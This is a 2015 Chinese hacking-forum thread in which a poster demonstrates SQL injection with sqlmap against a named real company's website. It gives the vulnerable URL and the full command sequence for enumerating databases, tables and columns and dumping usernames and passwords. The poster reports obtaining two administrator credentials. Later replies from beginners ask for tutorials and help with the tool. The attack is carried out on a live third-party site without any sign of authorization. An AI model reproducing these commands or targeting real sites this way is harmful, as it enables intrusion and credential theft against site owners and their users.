（小白，大牛勿喷！）kali linux下sqlmap的简单检测

小沫 · 发表于 2015-3-8 12:10:06

kali linux下sqlmap的简单检测

不shall不提权，就是简单的注入测试。

目标网址：http://www.cqyuhe.com/（重庆渝和实业有限公司）

注入点:http://www.cqyuhe.com/news_view.php?id=4

打开sqlmap输入sqlmap -u "http://www.cqyuhe.com/news_view.php?id=4" –dbs

得
QQ截图20150304013539.jpg

爆出两个表名

选择a0617152856
爆破表名

sqlmap -u "http://www.cqyuhe.com/news_view.php?id=4" -D a0617152856 –tables

得出

接下来选择userinfo(用户信息)进行爆破列名
sqlmap -u "http://www.cqyuhe.com/news_view.php?id=4" -D a0617152856 -T userinfo –columns
得出

然后选择username和userpwd进行猜解内容

sqlmap -u "http://www.cqyuhe.com/news_view.php?id=4" --dump -D a0617152856 -T userinfo -C username,userpwd

最后得出

两个管理员账户和密码

比较简单，大牛请放过我

战神-保家卫国 · 发表于 2015-3-8 12:50:17

小白，完全看不懂，哎

小沫 · 发表于 2015-3-8 13:10:27

战神-保家卫国发表于 2015-3-8 12:50
小白，完全看不懂，哎

额其实跟手工注入差不多首先是暴库，然后选择数据库爆表名，得出表名再爆表名就得出表下面的列名了，然后根据自己需要对列名进行猜解。

战神-保家卫国 · 发表于 2015-3-8 13:50:31

战神-保家卫国发表于 2015-3-8 12:50
小白，完全看不懂，哎

对不起哈，我是小白，一点点都不懂的小白，请问，有什么具体的教程吗

小沫 · 发表于 2015-3-8 14:03:22

战神-保家卫国发表于 2015-3-8 13:50
对不起哈，我是小白，一点点都不懂的小白，请问，有什么具体的教程吗

教程我以前有现在没有了

战神-保家卫国 · 发表于 2015-3-8 14:10:30

小沫发表于 2015-3-8 14:03
教程我以前有现在没有了

好吧，还是谢谢大神提供教程，我还是需要并且能看懂的时候再来吧

conosc · 发表于 2015-5-10 14:10:02

楼主能发下这类相关的学习资源么。。。最好是有整套的，，，我找到的都是些以前的，如阿d，明小子类的。。。{:soso_e154:}

孤独患者 · 发表于 2015-5-10 16:30:00

战神-保家卫国发表于 2015-3-8 13:50
对不起哈，我是小白，一点点都不懂的小白，请问，有什么具体的教程吗

百度搜索sqlmap使用笔记，很多结果。 sqlmap不只是linux能用，也有windows版的。

孤独患者 · 发表于 2015-5-10 16:34:11

conosc 发表于 2015-5-10 14:10
楼主能发下这类相关的学习资源么。。。最好是有整套的，，，我找到的都是些以前的，如阿d，明小子类的。。 ...

这类注入工具的使用方法都是大同小异的，都是爆库爆表爆列爆字，只不过一个是图形界面一个是字符界面。linux的工具想知道它都有什么功能只要输入工具名+空格+-help 就出来了。比windows工具方便多了。

conosc · 发表于 2015-5-10 18:44:12

孤独患者发表于 2015-5-10 16:34
这类注入工具的使用方法都是大同小异的，都是爆库爆表爆列爆字，只不过一个是图形界面一个是字符界面。li ...

能问下么，是我代码敲错了还是？？？怎么用sqlmap就找不到这表，之后读取字段也读取不到。。。不知是那的问题，，，
用啊d就给扫出来了，郁闷啊。。。。

（小白，大牛勿喷！）kali linux下sqlmap的简单检测

点评

评分

相关帖子

点评

点评

点评

点评

指导单位

旗下站点

联系我们